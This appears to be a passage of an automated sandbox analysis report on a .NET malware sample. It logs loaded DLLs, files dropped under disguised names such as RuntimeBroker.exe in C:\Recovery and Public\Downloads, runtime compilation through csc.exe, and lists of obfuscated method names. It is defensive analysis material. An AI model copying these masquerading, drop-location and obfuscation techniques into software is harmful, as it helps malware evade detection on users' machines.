Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\9da3c047e935b1
Source: W4tW72sfAD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: W4tW72sfAD.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: W4tW72sfAD.exe Static file information: File size 2079744 > 1048576
Source: W4tW72sfAD.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1fb400
Source: W4tW72sfAD.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.pdb source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.cs .Net Code: Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.L89zNPJrMt(16777336)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.L89zNPJrMt(16777247)),Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.L89zNPJrMt(16777264))})
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline"
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BA14ED4 push eax; ret 0_2_00007FFD9BA14ED5
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC5AC30 pushad ; iretd 0_2_00007FFD9BC5AC31
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC57BF2 push eax; iretd 0_2_00007FFD9BC57C91
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC591FA pushad ; retf 0_2_00007FFD9BC59229
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC629B5 pushad ; iretd 0_2_00007FFD9BC629B6
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC501CE push cs; ret 0_2_00007FFD9BC501CF
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC57964 push ebx; retf 0_2_00007FFD9BC5796A
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC5F123 push eax; iretd 0_2_00007FFD9BC5F124
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC5812C push ebx; ret 0_2_00007FFD9BC5816A
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC53C61 pushfd ; ret 0_2_00007FFD9BC53C7A
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8996D3 push FFFFFFE8h; ret 19_2_00007FFD9B8996F9
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8C3B2B push eax; ret 19_2_00007FFD9B8C3B34
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8C9E6A push eax; ret 19_2_00007FFD9B8C9E7D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8C9DFA push eax; ret 19_2_00007FFD9B8C9E7D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B8996D3 push FFFFFFE8h; ret 20_2_00007FFD9B8996F9
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B8C3B2B push eax; ret 20_2_00007FFD9B8C3B34
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B8C9E6A push eax; ret 20_2_00007FFD9B8C9E7D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B8C9DFA push eax; ret 20_2_00007FFD9B8C9E7D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8B96D3 push FFFFFFE8h; ret 21_2_00007FFD9B8B96F9
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8E3B2B push eax; ret 21_2_00007FFD9B8E3B34
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8E9E6A push eax; ret 21_2_00007FFD9B8E9E7D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8E9DFA push eax; ret 21_2_00007FFD9B8E9E7D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8C3B2B push eax; ret 22_2_00007FFD9B8C3B34
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8C9E6A push eax; ret 22_2_00007FFD9B8C9E7D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8C9DFA push eax; ret 22_2_00007FFD9B8C9E7D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8996D3 push FFFFFFE8h; ret 22_2_00007FFD9B8996F9
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8B797E pushad ; retn 5F4Bh 22_2_00007FFD9B8B7AAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9B76D2A5 pushad ; iretd 23_2_00007FFD9B76D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9B880580 pushad ; retf 23_2_00007FFD9B8805ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_00007FFD9B77D2A5 pushad ; iretd 24_2_00007FFD9B77D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_00007FFD9B89C2C5 push ebx; iretd 24_2_00007FFD9B89C2DA
Source: W4tW72sfAD.exe, 2Rq.cs High entropy of concatenated method names: 'Q51', 'of3', '_5s2', '_15N', '_6N4', '_296', 'd63', 'RGh', 'I46', '_7E1'
Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.cs High entropy of concatenated method names: 'c7Fg8tchQDAZE4INO3v', 'uHWS0BcyPmgmFY6ysAx', 'BPTavEfPI8', 'JV2ua5cNOro8egkKsWF', 'w24HmVc7PjtFJJtXI4t', 'bgW9OactUjdXdWLKPQq', 'HyO1cjcdqmXEkhQowD1', 'DSegNscfigTrSBwmZJL', 'z32YtXcuxv3t71Wh2PI', 'NM93iKc8vsfuuiDhPPj'
Source: W4tW72sfAD.exe, 9tn.cs High entropy of concatenated method names: 'dO4WBHb1ySHiBZsgmm6', 'ul6GRYbDedgfrmd8bcV', 'HNu2dRbcRWx0UnYu9sL', 'EcLDKsbrXecemheStbD', 's8jvAhbojPvayBVO5Tu', '_8x6', '_1R8', '_3eK', '_1ly', '_216'
Source: W4tW72sfAD.exe, QD5.cs High entropy of concatenated method names: 'v9g', '_9q4', '_831', '_1C5', '_1jS', 'zxRAkbWcvk8Ilog36jy', 'SdcBImWrB1UMEqhA159', 'hCAX09W1E05tgoaDwvY', 'IAqMRIWDpUNuA6Q0Nka', 'nDi3cjWoLMohy8Fb7QD'
Source: W4tW72sfAD.exe, cp1.cs High entropy of concatenated method names: '_567', '_5yt', '_3Q9', '_5V4', '_5FV', 'ode92udDPHEgFTm1p1e', 'djFM0RdoTrOi4YcN66n', 'FXtKeIdreN3Yx5OcboN', 'OEnm3ud1QDlAdOJFQZ7', 'TJ9Ltbd5tPBP5NPp0NP'
Source: W4tW72sfAD.exe, dm4.cs High entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
Source: W4tW72sfAD.exe, mY8.cs High entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'q1P', '_947', '_2pM', '_12R', '_1f8', '_71D'
Source: W4tW72sfAD.exe, a65.cs High entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'y73', '_8h4', 'nChrdP9lAfdlAA6fP6t', 'XPxSf39HhqddcYGMk9F', 'KlH9k19AMSAbnvYD3pm'
Source: W4tW72sfAD.exe, m4d.cs High entropy of concatenated method names: 'ffp', 'Ao2', 'qw4', 'ioE6dPTHOKVe7wKuj1F', 'f3dTkoTAORQ27UG8axe', 'wcUFIYTgRBjGBf4O8PE', 'et5tFoTl5asl6GkMb7p', '_3hL', 'Y6e', 'ah8'
Source: W4tW72sfAD.exe, 56I.cs High entropy of concatenated method names: 'ODM6APtRZbJ8uuKoj9R', 'AhAmmWtVMrsJqdC7bE2', 'habMQwtMSubMkNZXvip', 'hBLeeet2psJWxk8T07I', 'BfdmcKtnrO8nGE6ZWTp', '_7kT', '_376', 'B28', '_373', '_4p5'
Source: W4tW72sfAD.exe, sn1.cs High entropy of concatenated method names: '_2iL', '_9Y6', '_7Bm', 'thf', '_3j1', 'IFL', 'z4c', 'A4gNTlWsh3GEevms8wd', 'Qwre61WeWtHwWMrsa8L', 'YiM7rhWi6hnurkKxFaX'
Source: W4tW72sfAD.exe, 136.cs High entropy of concatenated method names: '_47i', 'A3wtUb0dsTCZQ8Zq877', 'gEXgdM07ocnUd7vpT5r', 'ReJcwT0tFI1AHdvZ452', 'qV9hFW0fKsqDQshHTRl', 'i5X', '_44S', 'W93', 'L67', '_2PR'
Source: W4tW72sfAD.exe, 18H.cs High entropy of concatenated method names: '_55d', '_64r', '_69F', '_478', 'J4c', '_4D8', '_645', '_5BW', '_4qr', '_16d'
Source: W4tW72sfAD.exe, N43.cs High entropy of concatenated method names: '_8l4', 'AHX', '_2fh', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'p4w'
Source: W4tW72sfAD.exe, 1y4.cs High entropy of concatenated method names: 'AEm', 'by1', '_7Sc', 'uM7', '_197', 'rZu', 'Q1J', '_24u', 'U67', 'xj7'
Source: W4tW72sfAD.exe, s67.cs High entropy of concatenated method names: 'w43', 'nZ5D4klzVr8vWTPMtMF', 'aZmKDdlqkwPhqmOjv2M', 'rmB4LtlEgtke4r08RSs', 'w2wx9EHeT0RWk4GfgLS', '_6Yf', 'BGIPbklcfkiMdxvjcZs', 'r6YJ8olrqlcZHHTlYZ1', 'aReZ6Xl1G1BN4rVnPhc', 'l7hyDdlDYkQs1RZRpsW'
Source: W4tW72sfAD.exe, B6D.cs High entropy of concatenated method names: '_7as', 'dxy', '_8Kv', '_3c8', '_94E', '_31e', '_0023Nn', 'Dispose', 'G1ZYj0wV1GbTKYPe9KU', 'WMUAh6wMcEPijdGieiV'
Source: W4tW72sfAD.exe, 8B6.cs High entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'P3U', 'j47', 'q8m1y4TB09gd3k34yQi', 'aFfbiaTpQhV2yM7uqD5', 'bd3NbJTjttZdnHdwkEt', 'mw8VPtTWH87mb7MY1Hf', 'vOjTvITU20VjjNAXgmb'
Source: W4tW72sfAD.exe, 1a2.cs High entropy of concatenated method names: '_4c9', '_22S', '_6q7', 'I7kxd9lTqb9tbAuruEk', 'DGlvEQlv6puZAxCX2g6', 'Odv3WhlHRXFmsCb8jcH', 'q3VgkYlAvKJGjhkOjuY', 'LPyDeZlIy422DgIJlHM', 'p73', '_79A'
Source: W4tW72sfAD.exe, 9r9.cs High entropy of concatenated method names: '_7K2', '_425', '_15J', 'aDDv0SY6mw61Et33gZH', 'GhInq6YagYRUxvtGlvd', 'RQ6uMEYGIg5mNo8KTlv', 'A0dgDlYmYTdBdsadTWq', 'tnd0opYksrH7x0rJCZn', '_81V', '_425'
Source: W4tW72sfAD.exe, 2A1.cs High entropy of concatenated method names: '_25r', 'h65', 'NY9', '_1vl', '_728', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
Source: W4tW72sfAD.exe, 7d5.cs High entropy of concatenated method names: 'aVj', 'Uk82aFkP2W09Q7ycNBY', 'Xp8EnpkJIW35bi9y24Y', 'f5Zg30kVZFy9NqKpqWw', 'njCEoukMDximPXNidTO', 'CPX', 'h7V', 'G6s', '_2r8', 'l39'
Source: W4tW72sfAD.exe, L32.cs High entropy of concatenated method names: '_3z1', '_171', 'C6s', '_61p', '_0023Nn', 'Dispose', 'dDyLRlwaWjh99uC5uJN', 'EGRiJMwmIc8XZGSGT5Z', 'zcxAtyw67flcKFd5OtA', 'ceKZMGwkcDbGqJeM0qk'
Source: W4tW72sfAD.exe, wnO.cs High entropy of concatenated method names: 'hI2', 'Y1OCypdIjptGMD6VNEv', 'KdOaUGdhvH3CrWn1BHr', 'F3jhQhdTcK8WwsUN8Rm', 'mbdULidvylU99kdFH9t', 'OmoU5ndyet3MygNAYlj', 'x4G', '_61h', 'PC5', 'pL7'
Source: W4tW72sfAD.exe, E32.cs High entropy of concatenated method names: '_9O1', 'jMp', 'vTF', 'XcH', '_13h', 'k22', '_4tg', 'wk8', '_59a', '_914'
Source: W4tW72sfAD.exe, m9F.cs High entropy of concatenated method names: '_7Ch', 'j31', 'j7q', 'uKJld8XZrOQERj7b3EL', 'C8OkaVX9wSax66ZPGFU', 'G53kUEXiemATyOnxPH9', 'YfjynVXsKHZAfPDCB3R', 'Hn5', '_273', '_223'
Source: W4tW72sfAD.exe, T1A.cs High entropy of concatenated method names: 'aRT', '_1n3', 'y6v', 'v8PLgctph85VlW6Q2IG', 'gYZDkxtjkOD0cbW7T9G', 'U2fOjttJVw9mdwqZtDY', 'tX34CqtBXFDwtym4teI', 'mQFByvtW9nXSMY4FpOh', 'AKL0pbtUDiNvLkJsPVp', 'Aubn2itbwkJdFScmXdf'
Source: W4tW72sfAD.exe, 7w3.cs High entropy of concatenated method names: 'F7d', 'TR1m9VQIl7Mp5wuE1f8', 'AuC29lQhfAkE84lgkfh', 'VtiepQQTT77tFMw4oRe', 'lOuSDuQvB91U6naUwAr', 'D7eO9lQypoI4VSyACqS', 'GDMnDbQXZsrALl4X0UY', 'UU8', 'd65', '_62b'
Source: W4tW72sfAD.exe, 67K.cs High entropy of concatenated method names: '_8zr', 'ssF', 'AhC', 'Gzl', 'GTHZCeAuUIfYuvDvDqj', 'xZtrWOA827EHuknviln', 'SeAfRFAdutXETlQkGnx', 'WfDdIKAfrlqpoQnA0U8', 'V5ySVYA3YHW64PuVmHh', 'l2IqaJA2XWrMmMq5766'
Source: W4tW72sfAD.exe, 556.cs High entropy of concatenated method names: 'n38', 'BTPZ4DQc0LlXZIgZmj2', 'rE7eiQQrPx5jDXuura5', 'SCYMtkQSNcVkR6bPArt', 'jlS9XyQKJXoGj4jOdUb', 'q9k7r2Q1NgB2yDsjAov', 'eq7', 'd65', '_43O', 'mI1'
Source: W4tW72sfAD.exe, gY4.cs High entropy of concatenated method names: '_5t1', 'd65', '_2rM', 'H87', '_1a3', '_2r8', '_851', 'dy8OK3NCGcFmHFhlHal', 'H1kx8qNFe9m5pFQt1oH', 'xJHeFTNgimTucHDwNjb'
Source: W4tW72sfAD.exe, 624.cs High entropy of concatenated method names: 'Yi3', '_492', '_975', '_2Kd', 'VWSowQNJlyF5M3ZpRfi', 'RQKCmrNBa4D97cTU1Di', 'waZ04cNpZCcZePUyMtM', 'XR9BYONM9Vhy4IjPCwB', 'zc3JMFNPRGti15H9EIw', 'ExlnqLNjICCYnBdMId6'
Source: W4tW72sfAD.exe, H62.cs High entropy of concatenated method names: '_46E', 'd65', '_7sJ', 'IiX', '_851', '_267', 'yVeQe4QJEnySrA863ew', 'xnejYaQBNvGFogYcow2', 'tl1QljQpUbJZ4ybJeW3', 'tAyiKqQj3ITYaoaSyC8'
Source: W4tW72sfAD.exe, 3u3.cs High entropy of concatenated method names: 'SwUtcD6UD7X7a2BB8sX', 'UFWYWs6bAZSiBj8lTHy', 'dbTPFF60mdywj2SJIhK', 'FH0Uep6jwE9d2NTj9Sr', 'ExU9A16WxsNHAJqaHZh', 'XZhQ0U6PdpId8xIvtVj', 'aZ9Nol6J4v4VfdT9XB6', 'fq056A6BBmBBWFArRTg', 'XCXY2r6VydwLPb05ibx', 'hWqpor6Mdlx291mWtEI'
Source: W4tW72sfAD.exe, 231.cs High entropy of concatenated method names: '_9b1', '_8op', '_4Xs', '_885', '_74i', 'r8N', '_3Lk', 'Htz', 'J52', 'BV1'
Source: W4tW72sfAD.exe, Ed2.cs High entropy of concatenated method names: '_8X5', 'd65', 'F1q', '_67U', 'kW7', '_851', 'Eh3bF2Q3be7mSsCreBK', 'cCUhmxQ2NZF2A5qyEn7', 'KuAH76QnNTADbKcJNPd', 'veuolqQuPlkkjWHyPJg'
Source: W4tW72sfAD.exe, QW6.cs High entropy of concatenated method names: 'vI2', '_9gU', '_63P', 'hn3', 'Fd4', '_9eJ', '_9W7', 'FtpM2TLX4qxBfYvNcyb', 'eb2Ue5LLZBPR5vjMHpB', 'oI7sK1LQQKQT6wR1s1I'
Source: W4tW72sfAD.exe, geUwbRLwd0WNm7K3QP.cs High entropy of concatenated method names: 'AUFzX9bS1O', 'MyNiDIciY0c3IYtMr94', 'CoUZ0Ncsm5TomLOPjqP', 'VaGynZcZPyiv6oDBQyq', 'B5WxrMc9Kfe2JGk6DsK', 'y2BJ4mcClYD009G4HNi', 'UBKKufKzev9HatByLmt', 'cdwF5dceksDnnWBPET5', 'wITIjdcFEqc0fOX0P1C', 'HqOOKtcg9xscR0V6h95'
Source: W4tW72sfAD.exe, j11.cs High entropy of concatenated method names: '_18q', 'FKm15RsXXePwq3MLTKa', 'xK0umUsLcWcCWxBRqtr', 'CJHnEpshwOKGFZ8lKUD', 'I2il1LsyYxUyg8Z4Chn', 'UdXhvMsQ97fq6FxiFRo', '_5N9', 't27', 'm4U', 'x67'
Source: W4tW72sfAD.exe, i1D.cs High entropy of concatenated method names: 'U94', 'yxoMpryPXHLA3UQSELu', 'SfFfDsyJJZ9jTED8Rv0', 'D7MuMHyBxnMk2GpvrJs', 'gPO7J4yV1KiWXPv3dTV', 'EXq4NdyMfM7Qw0vlKYL', 'Icyi4vypURktyA5GnqW', '_7F4', 'i21JbiytYfIpoVn9y4b', 'jAI2l0yd3eXPLLIwMFH'
Source: W4tW72sfAD.exe, 2L3.cs High entropy of concatenated method names: 'WJy', 'L71', '_285', '_653', 'DcU', 'OQv6S2JqsoKVK0DkBlp', 'OH5VP2JEG1uYdOOy6Hu', 'EanQexJxpfGxkYOdiM5', 'Nq14MgJOxBK4E9T1Yn4', 'P7QvPyJzy4YG8oNmQfW'
Source: W4tW72sfAD.exe, 655.cs High entropy of concatenated method names: 'M4n', 'rd6', 'cYGxb2FgwNfGI1WSBAZ', 'nofOsIFCjLToqjJFJ8F', 'KjfLutFFxhcgikRVTHg', 'XjpOVfFl9UJSrgJSKI5', 'tawKOfFHZHa5a8eeKuV', 'imEdYWFAMwfZDW7qULl', 'QhSDe4FTZHP9iet4et0', 'CZfgZ5Fv9lBI3Wq7Pxf'
Source: W4tW72sfAD.exe, 954.cs High entropy of concatenated method names: 'kF1', '_757', 'NMKxrCJhYqjiJYKLO1P', 'EAQqmvJy2gmvvRgntQR', 'j7jtoAJXdM30x2sg2FO', 'eR8Xd1JLnhjpblKanoP', 'Tqc35cJQJx3tmedx3Zk', 'Fgcso3JNO4hlh9kFcsm', 'ox8ClZJ7bLedmFhtZrl', 'VA86CxJtPVUCipwEE7f'
Source: W4tW72sfAD.exe, OBqe2IUAeSpOmlOQ4O.cs High entropy of concatenated method names: 'nOQdl4ODOg', 'tY3dXGtH5f', 'q9qdvQao7g', 'DpYddoq5nS', 'vUcduRRnlL', 'sqedUSL72O', 'MNddRugcTR', 'd6IBJRRp2Z', 'c8idQhNv3S', 'V1kdEyl02V'
Source: W4tW72sfAD.exe, 3J8.cs High entropy of concatenated method names: 'L2l', 'Jo5', '_2EF', 'i4P', '_6c7', '_77i', '_38r', '_142', 'Xhv', 'eT3'
Source: W4tW72sfAD.exe, yW3.cs High entropy of concatenated method names: 'ZF7', 'XPR', 'ID35sFAbwgY5fOFUjnP', 'jgJOaMA0njiV5YywCbY', 'HUuWmdAWL0d3wH2PNfU', 'Ac0dqSAU18iBhQNO2Vd', 'Jk9ILTAGWAFt091RHtv', 'UnUC3JAm1XDWQHwJEDM', 'mv18tPA6UEtpCow5FCE', 'cN49y4Aa4mc5TlOhHPn'
Source: W4tW72sfAD.exe, itVrv600AOcMBhsiIT.cs High entropy of concatenated method names: 'xdJaHaLaiy', 'V2DaSkpaDo', 'ojWablkBNc', 'DyHamcAFke', 'ArCa6Di0WB', 'EJyataZqWW', 'T7haJgpFAl', 'kNGa25aRtf', 'lj7acrWjTB', 'PYIahvCHho'
Source: W4tW72sfAD.exe, 11M.cs High entropy of concatenated method names: 'P5u', '_434', '_53T', '_7g1', 'b6C', 'lMUrcZfUC0PuryVeJFp', 'GiaNpSfbRxoUsRcCwBd', 'tDQPvVfjcbjqxhhBZNL', 'gm2URDfWTm6ntfesfGY', 'iUS6Auf05HyfbmjcZgN'
Source: W4tW72sfAD.exe, 7p3.cs High entropy of concatenated method names: '_0023Nn', 'Dispose', '_89Q', 'kwo', '_8y8', 'DIw9xxThJ2cUIpMKYEY', 'qYkscVTyhguaT4kMHtr', 'xec7mfTvpjWKLx5aOUF', 'KoqOY9TITogJB7Zf4Dc', 'lnVK6LTXiZyuO0qrsSn'
Source: W4tW72sfAD.exe, Z57.cs High entropy of concatenated method names: 'n39', 'V29', '_4yb', '_2Q4', 'p93', '_43v', '_8h4', 'ylOoUg9mECRXBpfpBGS', 'y58JLD96Xe77pXZ6cv8', 'mul5uP9aJlcF9WfRqQ6'
Source: W4tW72sfAD.exe, ifL.cs High entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', '_5I1', '_1v2', 'gY2', 'rV4', '_28E'
Source: W4tW72sfAD.exe, W1w.cs High entropy of concatenated method names: '_6L3', '_3Ev', 'M8uPqhIXHl0Kc0fnJqq', 'slxmxiILCmUdQqr2Jw6', 'w6YgX0IhvlsK8sd5T7p', 'hP2n3qIyN48WrAQdH5K', 'yVO443IQtgxhgK1Trn0', '_87m', '_5Dz', 'qTpUJeITcf2lKK6beyQ'
Source: W4tW72sfAD.exe, 26v.cs High entropy of concatenated method names: 'Ik8', '_6PE', '_544', 'AlygZ6h6vM8NyUCJ3wG', 'eBfeythaU2Yl7oRtNHu', 'Udj57yhGmFP7VE3ES4N', 'HF9p3ZhmHGi6H3yyShu', '_6iD', 'PUk', '_5x3'
Source: W4tW72sfAD.exe, 64r.cs High entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', '_124', 'so6PkgkKPQePHRr6Vru', 'z8pH4DkcPskE2NdXEjk', 'Ug2Wbmkr5ucKfsYWjB0', 'Rh6SlSk1BpfxGH6cDK2', 'MQZAwBkDwUsLHrlyDfm', 'bxHRaGkoJrnygJU6BxT'
Source: W4tW72sfAD.exe, TZ2.cs High entropy of concatenated method names: 'My5', 'V4X', 'zT6', '_457', '_1in', '_2rC', '_8j5', 'jsoM8O72YjiTRpv2DD8', 'aI5akg7nA8vlFvjCEVU', 'vghCtE78J16Kn27t2lA'
Source: W4tW72sfAD.exe, 7O8.cs High entropy of concatenated method names: '_93a', '_383', '_4w4', 'W2J', 'JX4', '_13F', 'XLI', '_64n', 'CdD', '_2y7'
Source: W4tW72sfAD.exe, jv4.cs High entropy of concatenated method names: '_1ay', 'V29', 'FLl', 'QUh', '_2Q4', '_68a', 'S2i', '_8h4', 'wMuvaBZq5MLYGByXsAb', 'oHBV91ZERXcJ5i0j5fv'
Source: W4tW72sfAD.exe, 781.cs High entropy of concatenated method names: '_54f', 'd65', '_917', 'HI7', '_119', '_851', 'ii6HgDLUDUMxKKsxe1c', 'ywVqCuLb1HMYAi9Lw0g', 'GFOxjcL0EKZsj2KIE9v', 'YXnuJWLjQpCy7xaFlQK'
Source: W4tW72sfAD.exe, 9EL.cs High entropy of concatenated method names: '_2SY', '_589', '_853', '_16O', 'ojwemcNGwQdPKBicMKV', 'CI1aGsNmhomY3L7FtHu', 'ca9DYgNb2tb5iWSqRJj', 'hTcsS7N0qxwZJf90voF', 'MZvahXN6UU8p5enY4YS', 'zgiHRENaBiVtRXlAAac'
Source: W4tW72sfAD.exe, eh3.cs High entropy of concatenated method names: '_5xP', 'f34', '_37Q', '_294', 'S8l', '_517', '_3A6', '_29Q', '_51Q', 'acq'
Source: W4tW72sfAD.exe, 4v1.cs High entropy of concatenated method names: 'P4B', 'tTbDqDFU56MDNmdIL7d', 'cZnY3oFbrq0SHWBAoNB', 'ixQNYHFjnAxx8jGbXSn', 'rQrteuFWOHPqceLdDCy', 'Qqm8WUF0BDkgp55NIjh', 'xTLvB7FGJaYmoV7ALsb', 'orip4nFmLopfq04du0a', 'j09H4SF63XLuXOmgnmU', 'ILL3O8FapTlGnit9CuC'
Source: W4tW72sfAD.exe, 3rw.cs High entropy of concatenated method names: 'N4R', '_9ke', 'HtShbnCxCMJlEB6QMXg', 'vD9gA6COh8MaqPg6EjE', 'gIwutqC5sCcAJCfkSDr', 'dUQkw8C4oM9Uiv4MeoT', 'tSf8ZhCqPufJa8mWsU6', 'j87BL0CETxXAlmXGOlX', 'K57bHKCzpgL9Eln7j2A', 'ckQnKGFeJR9LnB2uBG3'
Source: W4tW72sfAD.exe, 97s.cs High entropy of concatenated method names: 'Mnm', '_414', 'l54', '_6g7', '_5Xs', '_294', 'xi1', '_66G', 'CAV', 'hjw'
Source: W4tW72sfAD.exe, 89G.cs High entropy of concatenated method names: '_3n7', 'SqgnbLAzRjYtXgemKa5', 'xQJn3hTet66ChXxoPos', 'XdigkDAqXLgNDSeZCgb', 'mfyPDKAER57aNqTBBJC', 'zvZtP6TimuRabtBAx3y', '_27M', 'Fq3', 'EfD', 'QOdRBbA58jxoiQnb2YI'
Source: W4tW72sfAD.exe, 76n.cs High entropy of concatenated method names: 'QD5', 'dCSypbH9BA3eOaywQSj', 'fX8LyQHCXEZDN60qhWD', 'Ercl8EHFHRyYpo1SeMb', 'LfZ0cUHgkrJ30xa5PKm', 'Y24J5AHlNIqOeFuHvxC', 'lIp1tkHHjRB5XwT3uBS', 'kpENWiHs9xLydMJF9hY', 'mUlBcVHZLomWVrQjoiK', 'V2vb7gHATkAcYXGdRw6'
Source: W4tW72sfAD.exe, EO5.cs High entropy of concatenated method names: '_737', 'Z98', 'E4Q', 'ly9', 'ChGV0daUe6uLnVy2TeZ', 'OO1hwBabpTtTRH0jmwD', 'cXjuTca0jFdjuo1bbtj', 'AKnF4taGm6qwhiYHBls', 'a370IyamkoInQ2osVSh', 'qu3JOha6h3jRvrhd1u1'
Source: W4tW72sfAD.exe, 857.cs High entropy of concatenated method names: '_599', 'kf4', 'SJ2', '_736', 'P3r', '_85L', 's31', 'vFqifhZsWY6AZurrb6U', 'MvlIGWZZLn5AkudtWOL', 'XlK5LqZ9dfP7enjeZs8'
Source: W4tW72sfAD.exe, by1.cs High entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', '_673', '_8h4', 'KDx7kPCAbqfkL2LW3Um', 'pwvqiLCT35VcEuOOn8k', 'uI0kMcCv2UaLEX0n9p4'
